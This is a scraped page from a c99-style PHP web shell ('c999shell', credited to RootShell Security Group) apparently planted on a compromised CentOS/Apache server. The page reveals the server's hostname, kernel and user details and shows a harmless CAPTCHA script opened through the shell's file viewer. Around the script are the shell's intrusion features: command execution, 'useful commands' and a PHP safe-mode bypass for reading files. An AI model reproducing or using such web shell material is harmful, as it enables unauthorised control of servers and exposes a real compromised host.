Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/antispam/ drwxr-xr-x |
Viewing file: Select action/file-type: <?php ############################################################### # Anti-spam Image Generator (CAPTCHA) 1.0 ############################################################### # For updates visit http://www.zubrag.com/scripts/ ############################################################### // Font name to use. Make sure it is available on the server. // You could upload it to the same folder with script if it cannot find font. // By default it uses arial.ttf font. $font = 'arial.ttf'; // list possible characters to include on the CAPTCHA // ABCDEFGHIJKLMNOPQRSTUVWXYZ $charset = '0123456789'; // how many characters include in the CAPTCHA $code_length = 4; // antispam image height $height = 20; // antispam image width $width = 55; ############################################################ # END OF SETTINGS ############################################################ // this will start session if not started yet @session_start(); $code = ''; for($i=0; $i < $code_length; $i++) { $code = $code . substr($charset, mt_rand(0, strlen($charset) - 1), 1); } $font_size = $height * 0.7; $image = @imagecreate($width, $height); $background_color = @imagecolorallocate($image, 255, 255, 255); $noise_color = @imagecolorallocate($image, 20, 40, 100); /* add image noise */ for($i=0; $i < ($width * $height) / 4; $i++) { @imageellipse($image, mt_rand(0,$width), mt_rand(0,$height), 1, 1, $noise_color); } /* render text */ $text_color = @imagecolorallocate($image, 20, 40, 100); @imagettftext($image, $font_size, 0, 7,17, $text_color, $font , $code) or die('Cannot render TTF text.'); /* output image to the browser */ header('Content-Type: image/png'); @imagepng($image) or die('imagepng error!'); @imagedestroy($image); $_SESSION['AntiSpamImage'] = $code; exit(); ?> |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]-- |